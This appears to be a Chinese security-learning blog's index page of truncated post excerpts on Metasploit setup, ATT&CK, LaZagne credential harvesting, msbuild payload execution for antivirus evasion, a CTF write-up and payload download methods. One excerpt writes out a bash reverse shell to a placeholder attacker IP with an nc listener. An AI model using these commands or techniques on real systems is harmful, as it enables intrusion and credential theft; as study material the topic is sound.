环境 root运行 ubuntu18.04 腾讯云服务器 控制面板上面所有的端口全部放行 本机自带防火墙已拆 拆墙是为了能msf接受到会话 安装 别人写好的sh ...

最近准备学习一下关于ATT&CK的知识，这里面先来理解一下什么是ATT&CK(通过对ATT&CK的学习，可以很快的对安全领域有一个比较全面的认识)。 什么是MITRE MI ...

使用laZagne来抓取密码 什么是laZagne呢，它是一个Pythono编写的一个很强大的密码抓取工具，有名的工具比如mimikatz，但是只能限于windwos情况下进行抓取，并且对于免杀方面 ...

免杀学习之使用msbuild来执行payload 什么是msbuild msbuild是Microsoft和Visual Studio的生成系统，简单地说，这个就是用来编译你的项目，也就是所谓的编 ...

easy calc 这次的比赛自己一题都没有做出来，赛后看题解的时候很难受，其实有很多东西自己其实是可以做出来的，但是思路被限制了，可能这就是菜吧。 首先web题目就是一个easy calc，em ...

linux自带的bash反弹shell 在攻击机行执行 nc -lvvp 12345 来监听端口 在目标机上执行bash -i >& /dev/tcp/攻击机IP/12345 0& ...

利用ftp来下载payload文件 后记:这个我没有实验成功太菜了 利用vbs来下载payload 后记:这个已经利用成功了，网上说可以用script来执行，可能win10上面没有，但是 ...